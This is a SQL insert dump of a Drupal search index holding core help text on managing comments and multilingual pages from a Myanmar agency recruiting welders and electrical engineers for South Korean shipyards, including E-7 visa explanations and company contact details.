(6, 'ko', 'node_search', ' ကိုရီးယားနိုင်ငံရှိ သင်္ဘောကျင်းကို e73 viza နဲ့ သွားရောက်နိုင်ဖို့ သင်တန်းသားများကို ကိုရီးယားမှ လာရောက် ဂဟေဆော် စာမေးပွဲ အမြန်လာရောက် စစ်ဆေးနိုင်ဖို့ လိုအပ်သည်များကို ရှင်းလင်း ပြောကြား ကိုရီးယားနိုင်ငံရှိ သင်္ဘောကျင်းကို e73 viza နဲ့ သွားရောက်နိုင်ဖို့ သင်တန်းသားများကို ကိုရီးယားမှ လာရောက် ဂဟေဆော် စာမေးပွဲ အမြန်လာရောက် စစ်ဆေးနိုင်ဖို့ လိုအပ်သည်များကို ရှင်းလင်း ပြောကြား cometadmin mon 7032023 1920 sat 6032023 1113 ကိုရီးယားနိုင်ငံရှိ သင်္ဘောကျင်းကို e73 viza နဲ့ သွားရောက်နိုင်ဖို့ သင်တန်းသားများကို ကိုရီးယားမှ လာရောက် ဂဟေဆော် စာမေးပွဲ အမြန်လာရောက် စစ်ဆေးနိုင်ဖို့ လိုအပ်သည်များကို ရှင်းလင်း ပြောကြား ကိုရီးယားနိုင်ငံရှိ သင်္ဘောကျင်းကို e73 viza နဲ့ သွားရောက်နိုင်ဖို့ သင်တန်းသားများကို ကိုရီးယားမှ လာရောက် ဂဟေဆော် စာမေးပွဲ အမြန်လာရောက် စစ်ဆေးနိုင်ဖို့ လိုအပ်သည်များကို ရှင်းလင်း ပြောကြား  ', 0),
(7, 'en', 'help_search', ' configuring comments goal configure a content entity type subtype to allow commenting using a comment type that you have configured see managing content structure for more about content entities and fields and creating a comment type to configure a comment type who can configure comments  in order to follow these steps the field ui module must be installed you ll need the comment module s administer comments and comment settings permission in order to change comment settings for a comment field you ll also need to have the appropriate permission for adding fields to the entity type or subtype that the comments are attached to for example to add a comment field to content items provided by the node module you would need the node module s administer content types permission steps follow the steps in the related adding a field to an entity subtype topic to add a field of type comments to the desired entity type or subtype on the first field settings page choose the comment type to use for this entity type or subtype you ll also notice that the allowed number of values field cannot be changed for comment fields on the next field settings page enter the desired settings for the comment field  threading  whether or not the comments are collected by threads with people able to reply to particular comments instead of to the content entity itself comments per page  the maximum number of comments displayed on one page a pager will be added if you exceed this limit  anonymous commenting  whether or not anonymous commenters are allowed or required to leave contact information with their comments only applies if anonymous users have permission to post comments  show reply form on the same page as comments  whether the comment reply form is displayed on the same page as the comments if this is not selected clicking reply will open a new page with the reply form preview comments  whether previewing comments before submission is required   optional  or disabled  default value  each individual entity has its own comment settings but here you can set defaults for the comment settings for this entity type or subtype the comment settings values are  open  comments are allowed closed  past comments remain visible but no new comments are allowed hidden  past comments are hidden and no new comments are allowed additional resources online documentation for content comment settings ', 1787923659),
(7, 'en', 'node_search', ' e7 visa a special ability visa for foreign nationals e7 visa a special ability visa for foreign nationals admin tue 6202023 1229 thu 5182023 30 e7 visa it s a special ability visa for foreign nationals it s also divided into categories e71 visa professionals this is a visa given to managers and experts in a particular field e72 visa semiprofessionals this is a visa for people who work in office jobs or service e73 visa technicians technicians this is a visa for those working in the technical field e74 visa experienced technicians is an experienced technician visa usually workers with more than 5 years of experience are transferred from e9 e7 visa it s a special ability visa for foreign nationals it s also divided into categories e71 visa professionals this is a visa given to managers and experts in a particular field e72 visa semiprofessionals this is a visa for people who work in office jobs or service e73 visa technicians technicians this is a visa for those working in the technical field e74 visa experienced technicians is an experienced technician visa usually workers with more than 5 years of experience are transferred from e9  ', 0),
(7, 'ja', 'help_search', ' configuring comments goal configure a content entity type subtype to allow commenting using a comment type that you have configured see managing content structure for more about content entities and fields and creating a comment type to configure a comment type who can configure comments  in order to follow these steps the field ui module must be installed you ll need the comment module s administer comments and comment settings permission in order to change comment settings for a comment field you ll also need to have the appropriate permission for adding fields to the entity type or subtype that the comments are attached to for example to add a comment field to content items provided by the node module you would need the node module s administer content types permission steps follow the steps in the related adding a field to an entity subtype topic to add a field of type comments to the desired entity type or subtype on the first field settings page choose the comment type to use for this entity type or subtype you ll also notice that the allowed number of values field cannot be changed for comment fields on the next field settings page enter the desired settings for the comment field  threading  whether or not the comments are collected by threads with people able to reply to particular comments instead of to the content entity itself comments per page  the maximum number of comments displayed on one page a pager will be added if you exceed this limit  anonymous commenting  whether or not anonymous commenters are allowed or required to leave contact information with their comments only applies if anonymous users have permission to post comments  show reply form on the same page as comments  whether the comment reply form is displayed on the same page as the comments if this is not selected clicking reply will open a new page with the reply form preview comments  whether previewing comments before submission is required   optional  or disabled  default value  each individual entity has its own comment settings but here you can set defaults for the comment settings for this entity type or subtype the comment settings values are  open  comments are allowed closed  past comments remain visible but no new comments are allowed hidden  past comments are hidden and no new comments are allowed additional resources online documentation for content comment settings ', 1787923659),
(7, 'ja', 'node_search', ' e7 ビザは ザは外 は外国 外国人 国人に 人に対 に対す 対する する特 る特定 特定能 定能力 能力を 力を持 を持つ 持つ方 つ方の 方のた のため ための めの特 の特別 特別な 別なビ なビザ ビザで ザです  e7 ビザは ザは外 は外国 外国人 国人に 人に対 に対す 対する する特 る特定 特定能 定能力 能力を 力を持 を持つ 持つ方 つ方の 方のた のため ための めの特 の特別 特別な 別なビ なビザ ビザで ザです cometadmin mon 7032023 1921 thu 5182023 30 e7 ビザは ザは外 は外国 外国人 国人に 人に対 に対す 対する する特 る特定 特定能 定能力 能力を 力を持 を持つ 持つ方 つ方の 方のた のため ための めの特 の特別 特別な 別なビ なビザ ビザで ザであ であり 以下の 下のカ のカテ カテゴ テゴリ ゴリー リーに ーに分 に分け 分けら けられ られて れてい ていま います e71 ビザ 専門家 特定の 定の分 の分野 分野の 野の管 の管理 管理職 理職や 職や専 や専門 専門家 門家に 家に対 に対し 対して して与 て与え 与えら えられ られる れるビ るビザ ビザで ザです e72 ビザ 準専門 専門職 オフィ フィス ィスの スの仕 の仕事 仕事や 事やサ やサー サービ ービス ビス業 ス業に 業に従 に従事 従事す 事する する方 る方に 方に対 に対す 対する するビ るビザ ビザで ザです e73 ビザ 技術者 技術分 術分野 分野で 野で働 で働く 働く方 く方に 方に対 に対す 対する するビ るビザ ビザで ザです e74 ビザ 経験豊 験豊富 豊富な 富な技 な技術 技術者 経験豊 験豊富 豊富な 富な技 な技術 技術者 術者向 者向け 向けの けのビ のビザ ビザで 通常 5 年以上 以上の 上の経 の経験 経験を 験を持 を持つ 持つ労 つ労働 労働者 働者は e9 から移 ら移行 移行し 行しま します e7 ビザは ザは外 は外国 外国人 国人に 人に対 に対す 対する する特 る特定 特定能 定能力 能力を 力を持 を持つ 持つ方 つ方の 方のた のため ための めの特 の特別 特別な 別なビ なビザ ビザで ザであ であり 以下の 下のカ のカテ カテゴ テゴリ ゴリー リーに ーに分 に分け 分けら けられ られて れてい ていま います e71 ビザ 専門家 特定の 定の分 の分野 分野の 野の管 の管理 管理職 理職や 職や専 や専門 専門家 門家に 家に対 に対し 対して して与 て与え 与えら えられ られる れるビ るビザ ビザで ザです e72 ビザ 準専門 専門職 オフィ フィス ィスの スの仕 の仕事 仕事や 事やサ やサー サービ ービス ビス業 ス業に 業に従 に従事 従事す 事する する方 る方に 方に対 に対す 対する するビ るビザ ビザで ザです e73 ビザ 技術者 技術分 術分野 分野で 野で働 で働く 働く方 く方に 方に対 に対す 対する するビ るビザ ビザで ザです e74 ビザ 経験豊 験豊富 豊富な 富な技 な技術 技術者 経験豊 験豊富 豊富な 富な技 な技術 技術者 術者向 者向け 向けの けのビ のビザ ビザで 通常 5 年以上 以上の 上の経 の経験 経験を 験を持 を持つ 持つ労 つ労働 労働者 働者は e9 から移 ら移行 移行し 行しま します  ', 0),
(7, 'ko', 'help_search', ' configuring comments goal configure a content entity type subtype to allow commenting using a comment type that you have configured see managing content structure for more about content entities and fields and creating a comment type to configure a comment type who can configure comments  in order to follow these steps the field ui module must be installed you ll need the comment module s administer comments and comment settings permission in order to change comment settings for a comment field you ll also need to have the appropriate permission for adding fields to the entity type or subtype that the comments are attached to for example to add a comment field to content items provided by the node module you would need the node module s administer content types permission steps follow the steps in the related adding a field to an entity subtype topic to add a field of type comments to the desired entity type or subtype on the first field settings page choose the comment type to use for this entity type or subtype you ll also notice that the allowed number of values field cannot be changed for comment fields on the next field settings page enter the desired settings for the comment field  threading  whether or not the comments are collected by threads with people able to reply to particular comments instead of to the content entity itself comments per page  the maximum number of comments displayed on one page a pager will be added if you exceed this limit  anonymous commenting  whether or not anonymous commenters are allowed or required to leave contact information with their comments only applies if anonymous users have permission to post comments  show reply form on the same page as comments  whether the comment reply form is displayed on the same page as the comments if this is not selected clicking reply will open a new page with the reply form preview comments  whether previewing comments before submission is required   optional  or disabled  default value  each individual entity has its own comment settings but here you can set defaults for the comment settings for this entity type or subtype the comment settings values are  open  comments are allowed closed  past comments remain visible but no new comments are allowed hidden  past comments are hidden and no new comments are allowed additional resources online documentation for content comment settings ', 1787923659),
(7, 'ko', 'node_search', ' e7 visa a special ability visa for foreign nationals e7 visa a special ability visa for foreign nationals cometadmin mon 7032023 1921 thu 5182023 30 e7 visa နိုင်ငံခြား နိုင်ငံသား အထူးစွမ်းရည်ဗီဇာပါ အဲမှာလည်း အမျိုးစား ထပ်ခွဲထားပါသေးတယ် e71 visa professionals managers တွေနဲ့ နယ်ပယ်တခုခုမှာ တတ်ကျွမ်းနားလည်တဲ့ ပညာရှင်တွေကို ပေးတဲ့ ဗီဇာပါ e72 visa semiprofessionals office အလုပ်တွေရယ် ဒါမှမဟုတ် service ပိုင်းဆိုင်ရာ တာဝန်ထမ်းဆောင်နေတဲ့သူတွေ ရရှိတဲ့ ဗီဇာပါ e73 visa technicians နည်းပညာ ပညာရှင် နည်းပညာပိုင်းဆိုင်ရာ နယ်ပယ်မှာ လုပ်ကိုင်နေသူတွေ ရရှိတဲ့ ဗီဇာပါ e74 visa experienced technicians အတွေ့ကြုံရှိ ပညာရှင်ဗီဇာပါ များသောအားဖြင့် လုပ်သက် ၅နှစ်အထက် အတွေ့ကြုံရှိ လုပ်သားတွေ e9 ကနေ ပြောင်းလာရင် ရရှိတဲ့ ဗီဇာလည်း ဖြစ်ပါတယ်တဲ့ အမှတ်အပေါ်မူတည်ပြီး ပေးတယ်လို့လည်း သိရပါတယ် e7 visa it s a special ability visa for foreign nationals it s also divided into categories e71 visa professionals this is a visa given to managers and experts in a particular field e72 visa semiprofessionals this is a visa for people who work in office jobs or service e73 visa technicians technicians this is a visa for those working in the technical field e74 visa experienced technicians is an experienced technician visa usually workers with more than 5 years of experience are transferred from e9 e7 visa နိုင်ငံခြား နိုင်ငံသား အထူးစွမ်းရည်ဗီဇာပါ အဲမှာလည်း အမျိုးစား ထပ်ခွဲထားပါသေးတယ် e71 visa professionals managers တွေနဲ့ နယ်ပယ်တခုခုမှာ တတ်ကျွမ်းနားလည်တဲ့ ပညာရှင်တွေကို ပေးတဲ့ ဗီဇာပါ e72 visa semiprofessionals office အလုပ်တွေရယ် ဒါမှမဟုတ် service ပိုင်းဆိုင်ရာ တာဝန်ထမ်းဆောင်နေတဲ့သူတွေ ရရှိတဲ့ ဗီဇာပါ e73 visa technicians နည်းပညာ ပညာရှင် နည်းပညာပိုင်းဆိုင်ရာ နယ်ပယ်မှာ လုပ်ကိုင်နေသူတွေ ရရှိတဲ့ ဗီဇာပါ e74 visa experienced technicians အတွေ့ကြုံရှိ ပညာရှင်ဗီဇာပါ များသောအားဖြင့် လုပ်သက် ၅နှစ်အထက် အတွေ့ကြုံရှိ လုပ်သားတွေ e9 ကနေ ပြောင်းလာရင် ရရှိတဲ့ ဗီဇာလည်း ဖြစ်ပါတယ်တဲ့ အမှတ်အပေါ်မူတည်ပြီး ပေးတယ်လို့လည်း သိရပါတယ် e7 visa it s a special ability visa for foreign nationals it s also divided into categories e71 visa professionals this is a visa given to managers and experts in a particular field e72 visa semiprofessionals this is a visa for people who work in office jobs or service e73 visa technicians technicians this is a visa for those working in the technical field e74 visa experienced technicians is an experienced technician visa usually workers with more than 5 years of experience are transferred from e9  ', 0),
(8, 'en', 'help_search', ' creating a comment type goal create a new comment type see managing comments for information about comments and comment types who can create a comment type  users with the administer comment types and settings permission typically administrators can create comment types steps in the manage administrative menu navigate to structure   comment types  click add comment type  in the label field enter a name for the comment type which is how it will be listed in the administrative interface in the target entity type field select the entity type to be commented on see managing content structure for more about content entities and fields click save  the comment type will be created optionally if you have the core field ui module installed you can follow the steps in the related topics to add fields to the new comment type set up the editing form and configure the display  ', 1787923659),
(8, 'en', 'node_search', ' wanted people who want to work as a welder expert welding technician in korea shipyard wanted people who want to work as a welder expert welding technician in korea shipyard admin tue 6202023 1233 fri 5262023 36 overtime 3 hours a day and 22 days off after deducting money to be earned and other living and dining expenses health insurance and income tax expenses there may be more than 50000000 mmk left overtime 3 hours a day and 22 days off after deducting money to be earned and other living and dining expenses health insurance and income tax expenses there may be more than 50000000 mmk left  ', 0),
(8, 'ja', 'help_search', ' creating a comment type goal create a new comment type see managing comments for information about comments and comment types who can create a comment type  users with the administer comment types and settings permission typically administrators can create comment types steps in the manage administrative menu navigate to structure   comment types  click add comment type  in the label field enter a name for the comment type which is how it will be listed in the administrative interface in the target entity type field select the entity type to be commented on see managing content structure for more about content entities and fields click save  the comment type will be created optionally if you have the core field ui module installed you can follow the steps in the related topics to add fields to the new comment type set up the editing form and configure the display  ', 1787923659),
(8, 'ja', 'node_search', '  韓国の 国の造 の造船 造船所 船所で 所で溶 で溶接 溶接技 接技術 技術者 術者と 者とし として して働 て働き 働きた きたい たい人 い人を 人を募 を募集 募集し 集して してい ていま います 経験豊 験豊富 豊富な 富な溶 な溶接 溶接技 接技術 技術者   韓国の 国の造 の造船 造船所 船所で 所で溶 で溶接 溶接技 接技術 技術者 術者と 者とし として して働 て働き 働きた きたい たい人 い人を 人を募 を募集 募集し 集して してい ていま います 経験豊 験豊富 豊富な 富な溶 な溶接 溶接技 接技術 技術者 cometadmin mon 7032023 1914 fri 5262023 36 1 日 3 時間の 間の残 の残業 残業と 22 日 の休暇 休暇が 暇があ があり 収入か 入から から差 ら差し 差し引 し引か 引かれ かれる れるべ るべき べき金 き金額 金額や 額や生 や生活 生活費 食費 健康保 康保険 所得税 得税な 税など などの どの経 の経費 経費を 費を差 を差し 差し引 し引い 引いた いた後 50000000 mmk 以上が 上が残 が残る 残る可 る可能 可能性 能性が 性があ があり ありま ります 1 日 3 時間の 間の残 の残業 残業と 22 日 の休暇 休暇が 暇があ があり 収入か 入から から差 ら差し 差し引 し引か 引かれ かれる れるべ るべき べき金 き金額 金額や 額や生 や生活 生活費 食費 健康保 康保険 所得税 得税な 税など などの どの経 の経費 経費を 費を差 を差し 差し引 し引い 引いた いた後 50000000 mmk 以上が 上が残 が残る 残る可 る可能 可能性 能性が 性があ があり ありま ります  ', 0),
(8, 'ko', 'help_search', ' creating a comment type goal create a new comment type see managing comments for information about comments and comment types who can create a comment type  users with the administer comment types and settings permission typically administrators can create comment types steps in the manage administrative menu navigate to structure   comment types  click add comment type  in the label field enter a name for the comment type which is how it will be listed in the administrative interface in the target entity type field select the entity type to be commented on see managing content structure for more about content entities and fields click save  the comment type will be created optionally if you have the core field ui module installed you can follow the steps in the related topics to add fields to the new comment type set up the editing form and configure the display  ', 1787923659),
(8, 'ko', 'node_search', ' korea သင်္ဘောကျင်းတွင် welder ကျွမ်းကျင် ဂဟေဆော်ပညာရှင် အဖြစ် သွားရောက် လုပ်ကိုင်လိုသူများ အလိုရှိသည်  korea သင်္ဘောကျင်းတွင် welder ကျွမ်းကျင် ဂဟေဆော်ပညာရှင် အဖြစ် သွားရောက် လုပ်ကိုင်လိုသူများ အလိုရှိသည် cometadmin mon 7032023 1914 fri 5262023 36 overtime တစ်နေ့ ၃ နာရီနှင့် ၂၂ ရက်လောက်ဆင်း ရရှိမည့်ငွေနှင့် အခြားနေထိုင် စားသောက်စရိတ် ကျန်းမာရေးအာမခံနှင့် ၀င်ငွေခွန် ကုန်ကျစရိတ်များ နှုတ်ပြီးလျှင် မြန်မာငွေ သိန်း ၅၀အထက်လောက် ကျန်နိုင်ပါသည် overtime တစ်နေ့ ၃ နာရီနှင့် ၂၂ ရက်လောက်ဆင်း ရရှိမည့်ငွေနှင့် အခြားနေထိုင် စားသောက်စရိတ် ကျန်းမာရေးအာမခံနှင့် ၀င်ငွေခွန် ကုန်ကျစရိတ်များ နှုတ်ပြီးလျှင် မြန်မာငွေ သိန်း ၅၀အထက်လောက် ကျန်နိုင်ပါသည်  ', 0),
(9, 'en', 'help_search', ' disabling comments goal turn off commenting for a particular entity see managing content structure for more about content entities and fields note that if you want to turn off commenting for all entities of an entity type or subtype you will need to edit the field settings for the comment field see configuring comments for more about configuring the comment field who can disable comments  you will need the administer comments and comment settings permission in order to disable commenting you will also need permission to edit the entity that the comments are on steps find the entity you want to disable comments for and edit it for example to turn off comments on a content item you could find it by navigating in the manage administrative menu to content  filtering to find the content item and clicking edit  under comment settings  select the desired comment setting  open  comments are allowed closed  past comments remain visible but no new comments are allowed hidden  past comments are hidden and no new comments are allowed save the entity  ', 1787923659);
INSERT INTO `search_dataset` (`sid`, `langcode`, `type`, `data`, `reindex`) VALUES
(9, 'en', 'node_search', ' the first batch of welding trainees from new comet trading agency co ltd from sinmalike shipyard was met by the deputy minister of the ministry of transport and communications and gave speeches and inspected the training school the first batch of welding trainees from new comet trading agency co ltd from sinmalike shipyard was met by the deputy minister of the ministry of transport and communications and gave speeches and inspected the training school admin tue 6202023 1241 sat 6032023 43 the first batch of welding trainees from new comet trading agency co ltd from sinmalike shipyard was met by the deputy minister of the ministry of transport and communications and gave speeches and inspected the training school  ', 0),
(9, 'ja', 'help_search', ' disabling comments goal turn off commenting for a particular entity see managing content structure for more about content entities and fields note that if you want to turn off commenting for all entities of an entity type or subtype you will need to edit the field settings for the comment field see configuring comments for more about configuring the comment field who can disable comments  you will need the administer comments and comment settings permission in order to disable commenting you will also need permission to edit the entity that the comments are on steps find the entity you want to disable comments for and edit it for example to turn off comments on a content item you could find it by navigating in the manage administrative menu to content  filtering to find the content item and clicking edit  under comment settings  select the desired comment setting  open  comments are allowed closed  past comments remain visible but no new comments are allowed hidden  past comments are hidden and no new comments are allowed save the entity  ', 1787923659),
(9, 'ja', 'node_search', '  ニュー ューコ ーコメ コメッ メット ット商 ト商社 商社株 社株式 株式会 式会社 会社の 社のシ のシン シンマ ンマラ マライ ライク イク造 ク造船 造船所 船所か 所から からの らの初 の初め 初めて めての ての溶 の溶接 溶接研 接研修 研修生 修生た 生たち たちが 運輸通 輸通信 通信省 信省の 省の副 の副大 副大臣 大臣に 臣によ によっ よって って出 て出迎 出迎え 迎えら えられ スピー ピーチ ーチを チを行 を行い 訓練校 練校を 校を視 を視察 視察し 察しま しまし ました   ニュー ューコ ーコメ コメッ メット ット商 ト商社 商社株 社株式 株式会 式会社 会社の 社のシ のシン シンマ ンマラ マライ ライク イク造 ク造船 造船所 船所か 所から からの らの初 の初め 初めて めての ての溶 の溶接 溶接研 接研修 研修生 修生た 生たち たちが 運輸通 輸通信 通信省 信省の 省の副 の副大 副大臣 大臣に 臣によ によっ よって って出 て出迎 出迎え 迎えら えられ スピー ピーチ ーチを チを行 を行い 訓練校 練校を 校を視 を視察 視察し 察しま しまし ました cometadmin mon 7032023 1922 sat 6032023 43 ニュー ューコ ーコメ コメッ メット ット商 ト商社 商社株 社株式 株式会 式会社 会社の 社のシ のシン シンマ ンマラ マライ ライク イク造 ク造船 造船所 船所か 所から からの らの初 の初め 初めて めての ての溶 の溶接 溶接研 接研修 研修生 修生た 生たち たちが 運輸通 輸通信 通信省 信省の 省の副 の副大 副大臣 大臣に 臣によ によっ よって って出 て出迎 出迎え 迎えら えられ スピー ピーチ ーチを チを行 を行い 訓練校 練校を 校を視 を視察 視察し 察しま しまし ました  ', 0),
(9, 'ko', 'help_search', ' disabling comments goal turn off commenting for a particular entity see managing content structure for more about content entities and fields note that if you want to turn off commenting for all entities of an entity type or subtype you will need to edit the field settings for the comment field see configuring comments for more about configuring the comment field who can disable comments  you will need the administer comments and comment settings permission in order to disable commenting you will also need permission to edit the entity that the comments are on steps find the entity you want to disable comments for and edit it for example to turn off comments on a content item you could find it by navigating in the manage administrative menu to content  filtering to find the content item and clicking edit  under comment settings  select the desired comment setting  open  comments are allowed closed  past comments remain visible but no new comments are allowed hidden  past comments are hidden and no new comments are allowed save the entity  ', 1787923659),
(9, 'ko', 'node_search', ' ဆင်မလိုက် သင်္ဘောကျင်းမှ new comet trading agency co ltd မှ ပထမအသုတ် ဂဟေဆော် သင်တန်းသားများအား ပို့ဆောင်ရေးနှင့် ဆက်သွယ်ရေးဝန်ကြီးဌာနမှ ဒုဝန်ကြီးမှ လာရောက်တွေ့ဆုံ အမှာစကားများ ပြောကြားပေးပြီး သင်တန်းကျောင်းအား လာရောက်စစ်ဆေးစဉ် ဆင်မလိုက် သင်္ဘောကျင်းမှ new comet trading agency co ltd မှ ပထမအသုတ် ဂဟေဆော် သင်တန်းသားများအား ပို့ဆောင်ရေးနှင့် ဆက်သွယ်ရေးဝန်ကြီးဌာနမှ ဒုဝန်ကြီးမှ လာရောက်တွေ့ဆုံ အမှာစကားများ ပြောကြားပေးပြီး သင်တန်းကျောင်းအား လာရောက်စစ်ဆေးစဉ် cometadmin mon 7032023 1922 sat 6032023 43 ဆင်မလိုက် သင်္ဘောကျင်းမှ new comet trading agency co ltd မှ ပထမအသုတ် ဂဟေဆော် သင်တန်းသားများအား ပို့ဆောင်ရေးနှင့် ဆက်သွယ်ရေး ဝန်ကြီးဌာနမှ ဒုဝန်ကြီးမှ လာရောက်တွေ့ဆုံ အမှာစကားများ ပြောကြားပေးပြီး သင်တန်းကျောင်းအား လာရောက်စစ်ဆေးသည်  ', 0),
(10, 'en', 'help_search', ' moderating comments goal decide which comments are shown on the website who can moderate comments  users with the administer comments and comment settings permission typically administrators can moderate comments you will also need the access the content overview page permission from the node module if it is installed to navigate to the comment management page steps in the manage administrative menu navigate to content   comments  a list of all comments is shown to unpublish comments select one or more comments by checking the boxes on the left side right side in righttoleft languages then select unpublish comment from the action select list and click apply to selected items  if you select the delete comment action you can instead delete the unwanted comments to change the content of a comment click edit from the dropdown button for a particular comment to publish comments that are not yet visible on the website navigate to the unapproved comments tab select one or more comments by checking the boxes on the left side right side in righttoleft languages then select publish comment from the action select list and click apply to selected items  additional resources online documentation for moderating comments ', 1787923659),
(10, 'en', 'node_search', ' expert engineers who want to work at south korea shipyards as electrical engineer position are wanted desperately expert engineers who want to work at south korea shipyards as electrical engineer position are wanted desperately admin tue 6202023 1926 wed 6212023 1927 expert engineers who want to work at south korea shipyards as electrical engineer position are wanted desperately electrical engineer 1 qualification bachelor s degree or higher 1 year of experience in the field community college degree 5 years of experience in the field 2 related degree and experience degree electronic engineering electrical power engineering new comet trading agency co ltd 9775556677 9950947491 95015742 18393300018393344  ', 0),
(10, 'ja', 'help_search', ' moderating comments goal decide which comments are shown on the website who can moderate comments  users with the administer comments and comment settings permission typically administrators can moderate comments you will also need the access the content overview page permission from the node module if it is installed to navigate to the comment management page steps in the manage administrative menu navigate to content   comments  a list of all comments is shown to unpublish comments select one or more comments by checking the boxes on the left side right side in righttoleft languages then select unpublish comment from the action select list and click apply to selected items  if you select the delete comment action you can instead delete the unwanted comments to change the content of a comment click edit from the dropdown button for a particular comment to publish comments that are not yet visible on the website navigate to the unapproved comments tab select one or more comments by checking the boxes on the left side right side in righttoleft languages then select publish comment from the action select list and click apply to selected items  additional resources online documentation for moderating comments ', 1787923659),
(10, 'ja', 'node_search', '  韓国の 国の造 の造船 造船所 船所で 所で電 で電気 電気エ 気エン エンジ ンジニ ジニア ニアの アのポ のポジ ポジシ ジショ ション ョンで ンで働 で働き 働きた きたい たい経 い経験 経験豊 験豊富 豊富な 富なエ なエン エンジ ンジニ ジニア ニアを アを緊 を緊急 緊急で 急で募 で募集 募集し 集して してい ていま います   韓国の 国の造 の造船 造船所 船所で 所で電 で電気 電気エ 気エン エンジ ンジニ ジニア ニアの アのポ のポジ ポジシ ジショ ション ョンで ンで働 で働き 働きた きたい たい経 い経験 経験豊 験豊富 豊富な 富なエ なエン エンジ ンジニ ジニア ニアを アを緊 を緊急 緊急で 急で募 で募集 募集し 集して してい ていま います cometadmin mon 7032023 1924 wed 6212023 1927 韓国の 国の造 の造船 造船所 船所で 所で電 で電気 電気エ 気エン エンジ ンジニ ジニア ニアの アのポ のポジ ポジシ ジショ ション ョンで ンで働 で働き 働きた きたい たい経 い経験 経験豊 験豊富 豊富な 富なエ なエン エンジ ンジニ ジニア ニアを アを緊 を緊急 緊急で 急で募 で募集 募集し 集して してい ていま います 電気エ 気エン エンジ ンジニ ジニア 1 資格 大学の 学の学 の学士 学士号 士号ま 号また または たはそ はそれ それ以 れ以上 以上の 上の学 の学位 その分 の分野 分野で 野での 1 年の経 の経験 コミュ ミュニ ュニテ ニティ ティカ ィカレ カレッ レッジ ッジの ジの学 の学位 その分 の分野 分野で 野での 5 年の経 の経験 2 関連す 連する する学 る学位 学位と 位と経 と経験 学位 電子工 子工学 電力工 力工学 new comet trading agency co ltd 9775556677 9950947491 95015742 18393300018393344  ', 0),
(10, 'ko', 'help_search', ' moderating comments goal decide which comments are shown on the website who can moderate comments  users with the administer comments and comment settings permission typically administrators can moderate comments you will also need the access the content overview page permission from the node module if it is installed to navigate to the comment management page steps in the manage administrative menu navigate to content   comments  a list of all comments is shown to unpublish comments select one or more comments by checking the boxes on the left side right side in righttoleft languages then select unpublish comment from the action select list and click apply to selected items  if you select the delete comment action you can instead delete the unwanted comments to change the content of a comment click edit from the dropdown button for a particular comment to publish comments that are not yet visible on the website navigate to the unapproved comments tab select one or more comments by checking the boxes on the left side right side in righttoleft languages then select publish comment from the action select list and click apply to selected items  additional resources online documentation for moderating comments ', 1787923659),
(10, 'ko', 'node_search', ' expert engineers who want to work at south korea shipyards as electrical engineer position are wanted desperately expert engineers who want to work at south korea shipyards as electrical engineer position are wanted desperately cometadmin mon 7032023 1925 wed 6212023 1927 expert engineers who want to work at south korea shipyards as electrical engineer position are wanted desperately electrical engineer 1 qualification bachelor s degree or higher 1 year of experience in the field community college degree 5 years of experience in the field 2 related degree and experience degree electronic engineering electrical power engineering new comet trading agency co ltd 9775556677 9950947491 95015742 18393300018393344  ', 0),
(11, 'en', 'help_search', ' managing comments what is a comment  a comment is a piece of content typically posted by a website visitor which provides discussion or commentary on other content like blog posts and news articles comments are a type of content entity and can have fields that store text html markup and other data comments are attached to other content entities via comment fields see managing content structure for more about content entities and fields what is a comment type  comments are divided into comment types  which are the entity subtypes for the comment entity type each comment type has its own fields and its own form and display settings each type can be used to comment on a single entity type you can set up different comment types for different commenting purposes on your web site for example you might set up a comment type for recipes that has fields how did it taste and did the instructions work and another comment type for blog entries that has only a generic comment body field what is moderation  moderation is a workflow where comments posted by some users on your site are verified before being published to prevent spam and other bad behavior the core software provides basic moderation functionality you can configure permissions so that new comments posted by some user roles start as unpublished until a user with a different role reviews and publishes them contributed modules provide additional moderation and spamreduction functionality such as requiring untrusted users pass a captcha test before submitting comments and letting community members flag comments as possible spam see managing user accounts and site visitors for more about users permissions and roles overview of managing comments the core comment module provides the following functionality posting comments creating comment types the core field ui module allows you to attach fields to comment types and attach comment reference fields to other entities so that people can comment on them configuring commenting moderating comments as discussed above see the related topics listed below for specific tasks  ', 1787923659),
(11, 'en', 'node_search', ' contact us contact us admin wed 6212023 632 new comet trading agency co ltd building a32 2nd floor room201 myanmagonyi housing upper pansodan road mingalartaungnyunt tsp yangon myanmar phone 1 8393300 1 8393344 1 8393393 9 775556677 viber 959 5556677 email  newcometagency gmailcom website wwwnewcomettradingagencycom  ', 0),
(11, 'ja', 'help_search', ' managing comments what is a comment  a comment is a piece of content typically posted by a website visitor which provides discussion or commentary on other content like blog posts and news articles comments are a type of content entity and can have fields that store text html markup and other data comments are attached to other content entities via comment fields see managing content structure for more about content entities and fields what is a comment type  comments are divided into comment types  which are the entity subtypes for the comment entity type each comment type has its own fields and its own form and display settings each type can be used to comment on a single entity type you can set up different comment types for different commenting purposes on your web site for example you might set up a comment type for recipes that has fields how did it taste and did the instructions work and another comment type for blog entries that has only a generic comment body field what is moderation  moderation is a workflow where comments posted by some users on your site are verified before being published to prevent spam and other bad behavior the core software provides basic moderation functionality you can configure permissions so that new comments posted by some user roles start as unpublished until a user with a different role reviews and publishes them contributed modules provide additional moderation and spamreduction functionality such as requiring untrusted users pass a captcha test before submitting comments and letting community members flag comments as possible spam see managing user accounts and site visitors for more about users permissions and roles overview of managing comments the core comment module provides the following functionality posting comments creating comment types the core field ui module allows you to attach fields to comment types and attach comment reference fields to other entities so that people can comment on them configuring commenting moderating comments as discussed above see the related topics listed below for specific tasks  ', 1787923659),
(11, 'ja', 'node_search', '  お問い 問い合 い合わ 合わせ   お問い 問い合 い合わ 合わせ cometadmin mon 7032023 1748  ニュー コメッ メット トレー レーデ ーディ ディン ィング エージ ージェ ジェン ェンシ ンシー 株式会 式会社  building a32 2nd floor room201 myanmagonyi housing upper pansodan road mingalartaungnyunt tsp yangon myanmar phone 1 8393300 1 8393344 1 8393393 9 775556677 viber 959 5556677 email  newcometagency gmailcom website wwwnewcomettradingagencycom  ', 0),
